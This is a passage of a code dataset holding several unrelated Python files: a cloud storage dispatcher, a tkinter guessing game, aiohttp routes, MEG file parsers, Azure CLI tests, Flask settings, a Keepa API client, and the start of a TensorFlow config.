shutil.copyfileobj(rdr, fd)\n fd.seek(0, os.SEEK_SET)\n key.set_contents_from_file(fd)\n\nproviders = {\n \"azure\": AzureBlobStorageProvider(),\n \"s3\": S3Provider(),\n \"gs\": GoogleCloudStorageProvider(),\n \"file\": LocalProvider()\n}\n\n# Get a reader. Dispatches to the provider using the url scheme (s3://, ...). If\n# no url scheme is provided, local files are assumed.\ndef get(env, name):\n if \"://\" in name:\n scheme = name.split(\"://\")[0]\n if scheme in providers:\n return providers[scheme].get(env, name)\n else:\n raise Exception(\"unknown storage provider: \" + scheme)\n else:\n return providers[\"file\"].get(env, name)\n\n# Read `rdr` and put the contents in `name`. Dispatches to the provider using\n# the url scheme (s3://, gs://, ...). If no url scheme is provided, local\n# files are assumed.\ndef put(env, name, rdr):\n if \"://\" in name:\n scheme = name.split(\"://\")[0]\n if scheme in providers:\n return providers[scheme].put(env, name, rdr)\n else:\n raise Exception(\"unknown storage provider: \" + scheme)\n else:\n return providers[\"file\"].put(env, name, rdr)\n","sub_path":"node/storage.py","file_name":"storage.py","file_ext":"py","file_size_in_byte":9440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"570227593","text":"# Crazy Tales\r\n# Create a story based on user input\r\n\r\nfrom tkinter import *\r\n\r\nclass Application(Frame):\r\n\t\"\"\" GUI application that makes little game with user guessing number. \"\"\"\r\n\r\n\r\n\t\r\n\tdef __init__(self, master):\r\n\t\t\"\"\" Initialize Frame. \"\"\"\r\n\t\t# set the initial values\r\n\t\timport random\r\n\t\tself.limit_try = random.randint(5, 9)\r\n\t\tself.the_number = str(random.randint(1, 100))\r\n\t\tself.tries = 0\r\n\t\tself.win = 0\r\n\t\tself.options_pool = [str(list(range(1,101))[i]) for i in list(range(100))]\r\n\t\t\r\n\t\tsuper(Application, self).__init__(master) \r\n\t\tself.grid()\r\n\t\tself.create_widgets()\r\n\t\t\r\n\r\n\t\r\n\tdef create_widgets(self):\r\n\t\t\"\"\" Create widgets to get number and to display prompts. \"\"\"\r\n\t\t\r\n\t\t# create instruction label\r\n\t\tLabel(self,\r\n\t\t text = \"Welcome to 'Guess My Number'!\"\r\n\t\t ).grid(row = 0, column = 0, columnspan = 2, sticky = W)\r\n\t\tLabel(self,\r\n\t\t text = \"I'm thinking of a number between 1 and 100.\"\r\n\t\t ).grid(row = 1, column = 0, columnspan = 2, sticky = W)\r\n\t\tLabel(self,\r\n\t\t text = \"Try to guess it in as few attempts as possible.\"\r\n\t\t ).grid(row = 2, column = 0, columnspan = 2, sticky = W)\r\n\t\t\r\n\t\t# making python/tkinter label widget update with attempts left\r\n\t\tself.attempts = StringVar()\r\n\t\tLabel(self,\r\n\t\t textvariable = self.attempts,\r\n\t\t ).grid(row = 3, column = 0, columnspan = 2, sticky = W)\r\n\t\tself.attempts.set(\"You have \" + str(self.limit_try - self.tries) + \" attempts\") \r\n\r\n\t\t# create a label and text entry for a player's guess\r\n\t\tLabel(self,\r\n\t\t\t text = \"Take a guess: \"\r\n\t\t\t ).grid(row = 4, column = 0, sticky = W)\r\n\t\tself.guess_ent = Entry(self)\r\n\t\tself.guess_ent.grid(row = 4, column = 1, sticky = W)\r\n\t\t\r\n\t\t# making python/tkinter label widget update with status input check\r\n\t\tself.response = StringVar()\r\n\t\tLabel(self,\r\n\t\t textvariable = self.response,\r\n\t\t ).grid(row = 5, column = 0, columnspan = 2, sticky = W)\r\n\t\tself.response.set(\"Input integer number between 1 and 100\") \r\n\t\r\n\t\t# create a submit button\r\n\t\tButton(self,\r\n\t\t\t text = \"Check the guess\",\r\n\t\t\t command = self.check_guess\r\n\t\t\t ).grid(row = 4, column = 2, sticky = W)\r\n\r\n\t\tself.status_txt = Text(self, width = 125, height = 10, wrap = WORD)\r\n\t\tself.status_txt.grid(row = 6, column = 0, columnspan = 4)\r\n\t\t\r\n\r\n\t\r\n\t\r\n\tdef check_guess(self):\r\n\t\t\"\"\" Fill status text box with responce based on user guess. \"\"\"\r\n\t\t# get values from the GUI\r\n\t\tguess = self.guess_ent.get()\r\n\t\tif guess not in self.options_pool :\r\n\t\t\tself.response.set(\"Wrong value. It must be integer number\" +\r\n\t\t\t\" from 1 to 100. Try again\")\r\n\t\telse :\r\n\t\t\tif self.win == 0:\r\n\t\t\t\tself.tries += 1\r\n\t\t\t\tself.response.set(\"\")\r\n\t\t\t\tif guess != self.the_number and self.tries <= self.limit_try:\r\n\t\t\t\t\tself.status_txt.insert(0.0, guess)\r\n\t\t\t\t\tself.attempts.set(\"You have \" + str(self.limit_try - self.tries) + \" attempts\")\r\n\t\t\t\t\tif guess > self.the_number:\r\n\t\t\t\t\t\tself.status_txt.insert(0.0, \"\\nLower...\")\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tself.status_txt.insert(0.0, \"\\nHigher...\")\r\n\t\t\t\telif self.tries > self.limit_try:\r\n\t\t\t\t\tself.win = 1\r\n\t\t\t\t\tself.response.set(\"You have used all attempts or guessed the number, restart game's window\" )\r\n\t\t\t\t\tself.status_txt.insert(0.0, \"\\nWell, you'll be lucky next time.\")\r\n\t\t\t\t\tself.status_txt.insert(0.0, \"\\nThe number was \" + self.the_number)\r\n\t\t\t\t\tself.status_txt.insert(0.0, \"\\nRestart game's window for another game.\")\r\n\t\t\t\telif guess == self.the_number and self.tries <= self.limit_try :\r\n\t\t\t\t\tself.status_txt.insert(0.0, \"\\nYou guessed it! The number was \" + self.the_number)\r\n\t\t\t\t\tself.status_txt.insert(0.0, \"\\nRestart game's window for another game.\")\r\n\t\t\t\t\tself.win = 1\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\troot = Tk()\r\n\troot.title(\"Guess Number GUI\")\r\n\tapp = Application(root)\r\n\troot.mainloop()","sub_path":"Small_training_Games/guess_number_GUI.py","file_name":"guess_number_GUI.py","file_ext":"py","file_size_in_byte":3746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"405872894","text":"from views import Handler\nfrom aiohttp import web\n\n\ndef set_routes(app):\n \"\"\" Set routes, mechanism of mapping the URL directly to the code\"\"\"\n handler = Handler()\n\n app.router.add_route('GET', '/', handler.index)\n app.router.add_get('/message', handler.get_message)\n app.router.add_get('/connect', handler.connect_to_server)\n","sub_path":"0.1_PYTHON_DOCKER/gateway/api/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"215879842","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.5 (3351)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /usr/local/lib/python3.5/dist-packages/megdata/bti_process.py\n# Compiled at: 2018-10-24 06:01:48\n# Size of source mod 2**32: 7447 bytes\nimport os, time\nfrom .common import *\n\nclass BTIUserProcessHeader(object):\n\n @classmethod\n def from_fd(cls, fd):\n ret = cls()\n ret.nbytes = megdata_read_int32(fd)\n ret.processtype = megdata_read_str(fd, 20)\n ret.checksum = megdata_read_int32(fd)\n return ret\n\n def str_indent(self, indent=0):\n s = ' ' * indent + '\\n'\n return s\n\n def __str__(self):\n return self.str_indent()\n\n\nclass BTIGenUserProcess(object):\n\n @classmethod\n def from_fd(cls, fd):\n ret = cls()\n ret.user_space_size = megdata_read_int32(fd)\n os.lseek(fd, 32, os.SEEK_CUR)\n ret.user_data = os.read(fd, ret.user_space_size)\n return ret\n\n def str_indent(self, indent=0):\n s = ' ' * indent + '\\n'\n return s\n\n def __str__(self):\n return self.str_indent()\n\n\nclass BTINoiseProcess(object):\n\n @classmethod\n def from_fd(cls, fd):\n ret = cls()\n ret.user_space_size = megdata_read_int32(fd)\n os.lseek(fd, 32, os.SEEK_CUR)\n ret.noise = megdata_read_double(fd, count=ret.user_space_size / 8)\n return ret\n\n def str_indent(self, indent=0):\n s = ' ' * indent + '\\n'\n return s\n\n def __str__(self):\n return self.str_indent()\n\n\nclass BTIFilterProcess(object):\n\n @classmethod\n def from_fd(cls, fd):\n ret = cls()\n ret.frequency = megdata_read_float(fd)\n os.lseek(fd, 32, os.SEEK_CUR)\n return ret\n\n def str_indent(self, indent=0):\n s = ' ' * indent + '\\n'\n return s\n\n def __str__(self):\n return self.str_indent()\n\n\nclass BTIBandFilterProcess(object):\n\n @classmethod\n def from_fd(cls, fd):\n ret = cls()\n ret.high_freq = megdata_read_float(fd)\n ret.low_freq = megdata_read_float(fd)\n os.lseek(fd, 32, os.SEEK_CUR)\n return ret\n\n def str_indent(self, indent=0):\n s = ' ' * indent + '\\n'\n return s\n\n def __str__(self):\n return self.str_indent()\n\n\nclass BTIDefaultProcess(object):\n\n @classmethod\n def from_fd(cls, fd):\n ret = cls()\n ret.scaleoption = megdata_read_int32(fd)\n os.lseek(fd, 4, os.SEEK_CUR)\n ret.scale = megdata_read_double(fd)\n ret.dtype = megdata_read_int32(fd)\n ret.selected = megdata_read_int16(fd)\n ret.colordisplay = megdata_read_int16(fd)\n os.lseek(fd, 32, os.SEEK_CUR)\n return ret\n\n def str_indent(self, indent=0):\n s = ' ' * indent + '\\n'\n return s\n\n def __str__(self):\n return self.str_indent()\n\n\nclass BTIUserProcess(object):\n\n @classmethod\n def from_fd(cls, fd, bti_def=False):\n ret = cls()\n ret.hdr = BTIUserProcessHeader.from_fd(fd)\n if bti_def:\n ret.data = BTIDefaultProcess.from_fd(fd)\n else:\n if ret.hdr.processtype in ('b_filt_hp', 'b_filt_lp', 'b_filt_notch'):\n ret.data = BTIFilterProcess.from_fd(fd)\n else:\n if ret.hdr.processtype in ('b_filt_b_pass', 'b_filt_b_reject'):\n ret.data = BTIBandFilterProcess.from_fd(fd)\n else:\n if ret.hdr.processtype in ('b_noise', ):\n ret.data = BTINoiseProcess.from_fd(fd)\n else:\n ret.data = BTIGenUserProcess.from_fd(fd)\n return ret\n\n def str_indent(self, indent=0):\n s = ' ' * indent + '\\n'\n return s\n\n def __str__(self):\n return self.str_indent()\n\n\nclass BTIProcess(object):\n\n @classmethod\n def from_fd(cls, fd, processes=None):\n ret = cls()\n ret.hdr = BTIUserProcessHeader.from_fd(fd)\n ret.user = megdata_read_str(fd, 32)\n ret.timestamp = megdata_read_int32(fd)\n ret.filename = megdata_read_str(fd, 256)\n ret.total_steps = megdata_read_int32(fd)\n os.lseek(fd, 32, os.SEEK_CUR)\n curpos = os.lseek(fd, 0, os.SEEK_CUR)\n if curpos % 8 != 0:\n os.lseek(fd, 8 - curpos % 8, os.SEEK_CUR)\n ret.steps = []\n for s in range(ret.total_steps):\n if ret.hdr.processtype == 'BTi_defaults':\n st = BTIUserProcess.from_fd(fd, bti_def=True)\n else:\n st = BTIUserProcess.from_fd(fd)\n ret.steps.append(st)\n curpos = os.lseek(fd, 0, os.SEEK_CUR)\n if curpos % 8 != 0:\n os.lseek(fd, 8 - curpos % 8, os.SEEK_CUR)\n\n return ret\n\n def str_indent(self, indent=0):\n s = ' ' * indent + '\\n'\n return s\n\n def __str__(self):\n return self.str_indent()","sub_path":"pycfiles/megdata-1.0.3.linux-x86_64.tar/bti_process.cpython-35.py","file_name":"bti_process.cpython-35.py","file_ext":"py","file_size_in_byte":6836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"205372044","text":"# --------------------------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for license information.\n# --------------------------------------------------------------------------------------------\n\nimport unittest\n\n\nclass TestAAZHttpOperation(unittest.TestCase):\n\n def test_aaz_http_operation_serialize_content(self):\n from azure.cli.core.aaz._field_type import AAZObjectType, AAZListType, AAZDictType, AAZStrType, AAZIntType\n from azure.cli.core.aaz._operation import AAZHttpOperation\n\n # test required Case 1\n schema = AAZObjectType(flags={\"required\": True})\n schema.properties = AAZObjectType(flags={\"required\": True})\n\n v = schema._ValueCls(schema=schema, data=schema.process_data(None))\n data = AAZHttpOperation.serialize_content(v)\n self.assertEqual(data, {\"properties\": {}})\n\n schema.properties.prop1 = AAZListType(flags={\"required\": True})\n schema.properties.prop2 = AAZDictType(flags={\"required\": True}, serialized_name='property2')\n\n schema.properties.prop3 = AAZObjectType()\n schema.properties.prop4 = AAZObjectType(flags={\"required\": True, \"read_only\": True})\n schema.properties.prop5 = AAZDictType(flags={\"required\": True, \"read_only\": True}, serialized_name='Prop5')\n schema.properties.prop6 = AAZListType(flags={\"required\": True, \"read_only\": True})\n\n v = schema._ValueCls(schema=schema, data=schema.process_data(None))\n data = AAZHttpOperation.serialize_content(v)\n self.assertEqual(data, {\"properties\": {'prop1': [], \"property2\": {}}})\n\n # test required Case 2\n schema = AAZObjectType(flags={\"required\": True})\n schema.properties = AAZObjectType()\n schema.properties.prop1 = AAZListType(flags={\"required\": True})\n schema.properties.prop2 = AAZDictType(flags={\"required\": True})\n schema.properties.prop3 = AAZObjectType()\n schema.properties.prop3.sub1 = AAZIntType(serialized_name=\"subProperty1\")\n schema.properties.prop4 = AAZStrType(flags={\"required\": True, \"read_only\": True})\n\n v = schema._ValueCls(schema=schema, data=schema.process_data(None))\n data = AAZHttpOperation.serialize_content(v)\n self.assertEqual(data, {})\n\n v = schema._ValueCls(schema=schema, data=schema.process_data(None))\n v.properties.prop3.sub1 = 6\n self.assertTrue(v._is_patch)\n data = AAZHttpOperation.serialize_content(v)\n self.assertEqual(data, {'properties': {'prop3': {'subProperty1': 6}, 'prop1': [], 'prop2': {}}})\n\n schema.properties.prop3.sub2 = AAZStrType(flags={\"required\": True})\n v = schema._ValueCls(schema=schema, data=schema.process_data(None))\n v.properties.prop3.sub1 = 6\n with self.assertRaises(ValueError):\n AAZHttpOperation.serialize_content(v)\n\n\nclass TestAAZGenericUpdateOperation(unittest.TestCase):\n\n def test_aaz_generic_update_operation(self):\n from azure.cli.core.aaz._field_type import AAZObjectType, AAZListType, AAZDictType, AAZStrType, AAZIntType\n from azure.cli.core.aaz._operation import AAZGenericInstanceUpdateOperation\n\n schema = AAZObjectType()\n schema.props = AAZObjectType()\n schema.props.i = AAZIntType()\n schema.props.s = AAZStrType()\n schema.props.l = AAZListType()\n schema.props.l.Element = AAZObjectType()\n schema.props.l.Element.s = AAZStrType()\n schema.props.l2 = AAZListType()\n schema.props.l2.Element = AAZIntType()\n schema.props.d = AAZDictType()\n schema.props.d.Element = AAZObjectType()\n schema.props.d.Element.s = AAZStrType()\n schema.props.d2 = AAZDictType()\n schema.props.d2.Element = AAZStrType()\n\n instance = schema._ValueCls(schema=schema, data=schema.process_data({\n \"props\": {\n \"i\": 123,\n \"s\": \"abc\",\n \"l\": [\n {\n \"s\": \"la\"\n },\n {\n \"s\": \"lb\"\n },\n {\n \"s\": \"lc\"\n }\n ],\n \"d\": {\n \"a\": {\n \"s\": \"da\"\n },\n \"b\": {\n \"s\": \"db\"\n },\n \"c\": {\n \"s\": \"dc\"\n }\n }\n }\n }))\n\n AAZGenericInstanceUpdateOperation._update_instance_by_generic(\n instance,\n {\n \"actions\": [\n (\"set\", [\"props.i=666\"]),\n (\"set\", [\"props.s=sss\"]),\n (\"set\", [\"props.l[2].s='l2'\"]),\n (\"set\", [\"props.l2=[123,123]\"]),\n (\"set\", [\"props.d.c.s='d2'\"]),\n (\"set\", [\"props.d.e={'s':'d3'}\"]),\n (\"set\", [\"props.d2={'a':'123','b':'1234'}\"]),\n ]\n }\n )\n\n self.assertEqual(instance.props.i, 666)\n self.assertEqual(instance.props.s, \"sss\")\n self.assertEqual(instance.props.l[2].s, 'l2')\n self.assertEqual(instance.props.l2, [123,123])\n self.assertEqual(instance.props.d['c'].s, 'd2')\n self.assertEqual(instance.props.d['e'], {'s':'d3'})\n self.assertEqual(instance.props.d2, {'a':'123','b':'1234'})\n\n AAZGenericInstanceUpdateOperation._update_instance_by_generic(\n instance,\n {\n \"force_string\": True,\n \"actions\": [\n (\"set\", [\"props.s=666\"]),\n (\"set\", [\"props.l[2].s=2\"]),\n (\"set\", [\"props.d.c.s=3\"]),\n ]\n }\n )\n self.assertEqual(instance.props.s, \"666\")\n self.assertEqual(instance.props.l[2].s, '2')\n self.assertEqual(instance.props.d['c'].s, '3')\n\n AAZGenericInstanceUpdateOperation._update_instance_by_generic(\n instance,\n {\n \"actions\": [\n (\"add\", [\"props.l\", \"{'s':'add_l'}\"]),\n ]\n }\n )\n self.assertEqual(instance.props.l[3], {'s':'add_l'})\n\n AAZGenericInstanceUpdateOperation._update_instance_by_generic(\n instance,\n {\n \"actions\": [\n (\"remove\", [\"props.l\", \"3\"]),\n (\"remove\", [\"props.l2\"]),\n (\"remove\", [\"props.d2\"]),\n (\"remove\", [\"props.d.e\"]),\n ]\n }\n )\n\n self.assertEqual(len(instance.props.l), 3)\n self.assertEqual(instance.props.l2, [])\n self.assertEqual(instance.props.d2, {})\n self.assertEqual(len(instance.props.d), 3)\n","sub_path":"src/azure-cli-core/azure/cli/core/tests/test_aaz_operation.py","file_name":"test_aaz_operation.py","file_ext":"py","file_size_in_byte":6956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"234967096","text":"\"\"\"\n[This file contains various environment variables used by Flask]\n\"\"\"\n\n# Flask settings\nFLASK_SERVER_HOST = \"0.0.0.0\"\nFLASK_SERVER_PORT = 8000\nFLASK_DEBUG = True # Do not use debug mode in production\nFLASK_TESTING = True # Allows for auto reloading\nFLASK_ENV = \"development\"\n# Flask-Restplus settings\nRESTPLUS_SWAGGER_UI_DOC_EXPANSION = \"list\"\nRESTPLUS_VALIDATE = True\nRESTPLUS_MASK_SWAGGER = False\nRESTPLUS_ERROR_404_HELP = False\nTEMPLATE_DIR = \"web/templates\"\nSTATIC_DIR = \"web/static\"\n","sub_path":"srv/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"551461540","text":"# -*- coding: utf-8 -*-\n\"\"\"\nInterface module to download Amazon product and history data from keepa.com\n\n\"\"\"\n\n# Standard library\nimport logging\n\n# for IPython\ntry:\n reload(logging)\nexcept:\n pass\n\nimport time\nimport threading\n\n# Other libraries\nimport requests\nimport numpy as np\n\n# This module\nfrom keepaAPI import keepaTime\n\n# Disable logging in requests module\nlogging.getLogger(\"requests\").setLevel(logging.ERROR)\nlogging.getLogger(\"urllib3\").setLevel(logging.ERROR)\n\n\n# Request limit\nreqlim = 100\n\n# Status code dictionary/key\nscodes = {'400': 'REQUEST_REJECTED',\n '402': 'PAYMENT_REQUIRED',\n '405': 'METHOD_NOT_ALLOWED',\n '429': 'NOT_ENOUGH_TOKEN'}\n\ndcodes = ['RESERVED', 'US', 'GB', 'DE', 'FR', 'JP', 'CA', 'CN', 'IT', 'ES', 'IN', 'MX']\n\n\ndef ThreadRequest(asins, settings, products, sema, err):\n \"\"\"\n Function to send query to keepa and store results\n\n Supports threads\n \n \"\"\"\n\n # Attempt request\n try:\n try:\n response = ProductQuery(asins, settings)\n products.extend(response['products'])\n except Exception as e:\n logging.warning('Exception {:s} in thread. Waiting 60 seconds for retry.'.format(e))\n time.sleep(60)\n \n # Try again\n response = ProductQuery(asins, settings)\n products.extend(response['products'])\n \n except:\n # Track error\n err = True\n\n # Log\n if not err:\n logging.info('Completed {:d} ASIN(s)'.format(len(products)))\n else:\n logging.err('Request failed')\n \n # finally, release thread\n sema.release()\n \n\ndef GetUserStatus(accesskey):\n \"\"\" Queries keepa for available tokens \"\"\"\n \n url = 'https://api.keepa.com/token/?key={:s}'.format(accesskey)\n r = requests.get(url)\n status_code = r.status_code\n \n # Return parsed response if successful\n if status_code == 200:\n response = r.json()\n return response\n\n elif str(status_code) in scodes:\n raise Exception(scodes[str(status_code)])\n else:\n raise Exception('REQUEST_FAILED')\n\n\nclass UserStatus(object):\n \"\"\" Object to track and store user status on keepa locally \"\"\"\n \n def __init__(self, accesskey):\n \"\"\" Initialize user status using server side info \"\"\"\n self.accesskey = accesskey\n self.UpdateFromServer()\n\n\n def UpdateFromServer(self):\n \"\"\" Update user status from server \"\"\"\n self.status = GetUserStatus(self.accesskey)\n \n \n def LocalUpdate(self):\n \"\"\"\n Update the local user status using existing timestamp and refill rate\n \"\"\"\n \n # Get current timestamp in miliseconds from unix epoch\n t = int(time.time()*1000)\n\n # Number of times refill has occured\n lstrefil = self.status['timestamp'] - (60000 - self.status['refillIn'])\n nrefil = (t - lstrefil)/60000.0\n\n if nrefil > 1:\n self.status['tokensLeft'] += self.status['refillRate']*int(nrefil)\n \n if self.status['tokensLeft'] > 60*self.status['refillRate']:\n self.status['tokensLeft'] = 60*self.status['refillRate']\n\n # Update timestamps\n self.status['timestamp'] = t\n self.status['refillIn'] = int((1 - nrefil % 1)*60000)\n\n\n def RemoveTokens(self, tokens):\n \"\"\" Remove tokens from tokensLeft to track requests to server \"\"\"\n self.LocalUpdate()\n self.status['tokensLeft'] -= tokens\n\n\n def RemainingTokens(self):\n \"\"\" Returns the tokens remaining to the user \"\"\"\n return self.status['tokensLeft']\n \n \n def TimeToRefill(self, ):\n \"\"\" Returns the time to refill in seconds \"\"\"\n # Get current timestamp in miliseconds from unix epoch\n now = int(time.time()*1000)\n timeatrefile = self.status['timestamp'] + self.status['refillIn']\n \n timetorefil = timeatrefile - now + 1000 # plus one second fudge factor\n if timetorefil < 0:\n timetorefil = 0\n \n # Return value in seconds\n return timetorefil/1000.0\n\n\n def UpdateFromResponse(self, response):\n \"\"\" Updates user status from response \"\"\"\n for key in self.status:\n self.status[key] = response[key]\n\n\ndef ProductQuery(asins, settings):\n \"\"\"\n Sends query to keepa API and returns parsed JSON result\n \n INPUTS\n \n Required:\n asins (np.ndarray)\n Array of ASINs. Must be between 1 and 100 ASINs\n settings (dictonary) containing: \n\n accesskey: (string)\n keepa access key string\n\n domain: (string)\n One of the following Amazon domains:\n RESERVED, US, GB, DE, FR, JP, CA, CN, IT, ES, IN, MX\n \n offers (bool default False)\n Adds product offers to product data\n\n update (int default None)\n If data is older than the input interger, keepa will update\n their database and return live data. If set to 0 (live data),\n then request may cost an additional token\n\n history (bool default True)\n When set to True includes the price, sales, and offer history\n of a product. Set to False to reduce request time if data is\n not required\n \n OUTPUTS\n Response, if successful, will contain the following fields\n n\n\n products\n Dictionary of product data. Length equal to number of successful\n ASINs\n\n refillIn\n Time in miliseconds to the next refill of tokens\n\n refilRate\n Number of tokens refilled per minute\n\n timestamp\n \n tokensLeft\n Remaining tokens\n\n tz\n Timezone. 0 is UTC\n \n \"\"\"\n \n # ASINs convert to comma joined string\n nitems = len(asins)\n if nitems > 100:\n raise Exception('Too many items in product query')\n asinstr = ','.join(asins) \n \n # Assemble and send request\n # Accepts gzip encoding and defaults with no cache\n payload = {'key': settings['accesskey'],\n 'domain': dcodes.index(settings['domain']), \n 'asin': asinstr}\n\n if settings['offers']:\n payload['offers'] = settings['offers']\n \n if settings['update'] != None:\n payload['update'] = int(settings['update'])\n \n if not settings['history']:\n payload['history'] = 0\n \n r = requests.get('https://api.keepa.com/product/?', params=payload)\n status_code = r.status_code\n\n # Return parsed response if successful\n if status_code == 200:\n # Parse JSON response\n response = r.json()\n \n # Replace csv with parsed data if history enabled\n if settings['history']:\n for product in response['products']:\n if product['csv']: # if data exists\n product['data'] = ParseCSV(product['csv'], settings['to_datetime'])\n del product['csv']\n \n return response\n\n elif str(status_code) in scodes:\n raise Exception(scodes[str(status_code)])\n \n else:\n raise Exception('REQUEST_FAILED')\n\n\ndef ParseCSV(csv, to_datetime):\n \"\"\"\n \n Parses csv list from keepa into a python dictionary\n \n csv is organized as the following\n index item\n 0 Amazon Price\n 1 Marketplace New\n 2 Marketplace Used\n 3 Sales Rank\n 4 Listing Price\n 5 Collectable Price\n 11 New Offers\n 12 Used Offers\n 14 Collectable Offers\n \n \n \"\"\"\n \n # index in csv, key name, isfloat (is price)\n indices = [[0, 'AmazonPrice', True],\n [1, 'MarketplaceNew', True],\n [2, 'MarketplaceUsed', True],\n [3, 'SalesRank', False],\n [4, 'ListingPrice', True],\n [5, 'CollectablePrice', True],\n [11, 'NewOffers', False],\n [12, 'UsedOffers', False],\n [14, 'CollectableOffers', False]]\n\n\n product_data = {}\n \n for index in indices:\n # Check if it exists\n ind = index[0]\n if csv[ind]:\n key = index[1]\n \n # Data goes [time0, value0, time1, value1, ...]\n product_data[key + '_time'] = keepaTime.KeepaMinutesToTime(csv[ind][::2], to_datetime)\n\n # Convert to float price if applicable\n if index[2]:\n product_data[key] = np.array(csv[ind][1::2], np.float)/100.0\n else:\n product_data[key] = np.asarray(csv[ind][1::2])\n\n return product_data\n\n\ndef CheckASINs(asins):\n \"\"\" Checks if the input ASINs are valid and formats them \"\"\"\n if isinstance(asins, list) or isinstance(asins, np.ndarray):\n return np.unique(asins)\n\n elif isinstance(asins, str) or isinstance(asins, unicode):\n if len(asins) != 10:\n return np.array([])\n else:\n return np.asarray([asins])\n\n#==============================================================================\n# Main API\n#==============================================================================\nclass API(object):\n \"\"\" Class to support html interface to keepa server \"\"\"\n \n def __init__(self, accesskey):\n \"\"\" Initializes API \"\"\"\n \n # Disable logging (except for warnings) for requests module \n# logging.getLogger(\"requests\").setLevel(logging.WARNING)\n\n # Create logger\n logstr = '%(levelname)-7s: %(message)s'\n logging.basicConfig(format=logstr, level='DEBUG', filename='')\n logging.info('Connecting to keepa using key {:s}'.format(accesskey))\n\n # Store access key\n self.accesskey = accesskey\n\n # Store user's available tokens\n self.user = UserStatus(self.accesskey)\n logging.info('{:d} tokens remain'.format(self.user.RemainingTokens()))\n\n\n def WaitForTokens(self, updatetype='server'):\n \"\"\"\n Checks local user status for any remaining tokens and waits if none are\n available\n \n \"\"\"\n \n if updatetype=='server':\n # Perform server update\n self.user.UpdateFromServer()\n else:\n # Perform local update\n self.user.LocalUpdate()\n\n # Wait if no tokens available\n if self.user.RemainingTokens() <= 0:\n tdelay = self.user.TimeToRefill()\n logging.info('Waiting {:.2f} seconds for additional tokens'.format(tdelay))\n time.sleep(tdelay)\n self.user.LocalUpdate()\n\n\n def ProductQuery(self, asins, domain='US', history=True, offers=False,\n update=None, nthreads=4, to_datetime=True):\n \"\"\"\n Performs a product query of a list, array, or single ASIN. Returns a\n list of product data with one entry for each product.\n \n INPUTS:\n asins (required string list np.ndarray)\n A list, array, or single ASIN. Each ASIN should be 10\n characters and match a product on Amazon. ASINs not matching\n Amazon product or duplicate ASINs will return no data.\n \n domain: (optional string)\n One of the following Amazon domains:\n RESERVED, US, GB, DE, FR, JP, CA, CN, IT, ES, IN, MX\n \n offers (optional bool default False)\n Adds product offers to product data\n\n update (optional int default None)\n If data is older than the input interger, keepa will update\n their database and return live data. If set to 0 (live data),\n then request may cost an additional token\n\n history (optional bool default True)\n When set to True includes the price, sales, and offer history\n of a product. Set to False to reduce request time if data is\n not required\n \n nthreads (optional int default 4)\n Number of threads to interface to keepa with. More threads\n means potentially faster batch response, but more bandwidth.\n Probably should be kept under 20.\n \n \"\"\"\n # Format asins into numpy array\n try:\n asins = CheckASINs(asins)\n except:\n raise Exception('Invalid ASIN input')\n\n nitems = len(asins)\n if nitems == 1:\n logging.info('EXECUTING SINGLE PRODUCT QUERY'.format(nitems))\n else:\n logging.info('EXECUTING {:d} ITEM PRODUCT QUERY'.format(nitems))\n\n # Update user status and determine if there any tokens available\n self.user.UpdateFromServer()\n \n # Assemble settings\n settings = {'domain': domain,\n 'accesskey': self.accesskey,\n 'offers': offers,\n 'update': None,\n 'history': history,\n 'to_datetime': to_datetime}\n \n # Report time to completion\n tcomplete = float(nitems - self.user.RemainingTokens())/self.user.status['refillRate'] - (60000 - self.user.status['refillIn'])/60000.0\n if tcomplete < 0.0:\n tcomplete = 0.5\n logging.info('Estimated time to complete {:d} querie(s) is {:.2f} minutes'.format(len(asins), tcomplete))\n logging.info('\\twith a refill rate of {:d} token(s) per minute'.format(self.user.status['refillRate']))\n\n # initialize product and thread lists\n products = []\n threads = []\n \n # Error tracking\n err = False \n \n # Create thread pool\n sema = threading.BoundedSemaphore(value=nthreads)\n \n # Number of requests is dependent on the number of items and request limit\n # Use available tokens first\n idx = 0 # or number complete\n while idx < nitems:\n\n # listen for error\n if err:\n raise Exception ('Error in thread')\n\n # Check and then wait for tokens if applicable\n self.WaitForTokens('local')\n \n nrequest = nitems - idx\n if nrequest > self.user.RemainingTokens():\n nrequest = self.user.RemainingTokens()\n if nrequest > reqlim:\n nrequest = reqlim\n \n # Increment, assemble request, and update available tokens\n asin_request = asins[idx:idx + nrequest]\n idx += nrequest\n self.user.RemoveTokens(nrequest)\n \n # Request data from server\n # Assemble partial array of ASINs for this request\n sema.acquire() # Limit to nthreads. Wait if requesting more\n t = threading.Thread(target=ThreadRequest, args=(asin_request,\n settings,\n products, sema,\n err))\n t.start()\n threads.append(t)\n \n # Wait for all threads to complete before returning products\n for t in threads:\n t.join()\n\n return products\n\n \n\n\n \n ","sub_path":"keepaAPI/Interface.py","file_name":"Interface.py","file_ext":"py","file_size_in_byte":15418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"81480583","text":"import tensorflow as tf\nimport config\n\nfrom model_utils import calculate_conv_output_size\n\n\nn_x = config.IMAGE_PXL_SIZE_X\nn_y = config.IMAGE_PXL_SIZE_Y\nn_z = config.SLICES\n\n# This handles padding in both convolution and pooling layers\nstrides = [[1, 1, 1],\n [2, 4, 4],\n [1, 1, 1],\n [2, 2, 2],\n [1, 1, 1],\n [2, 2, 2]]\n\nfilters = [[3, 5, 5],\n [3, 5, 5],\n [3, 3, 3],\n [3, 3, 3],\n [3, 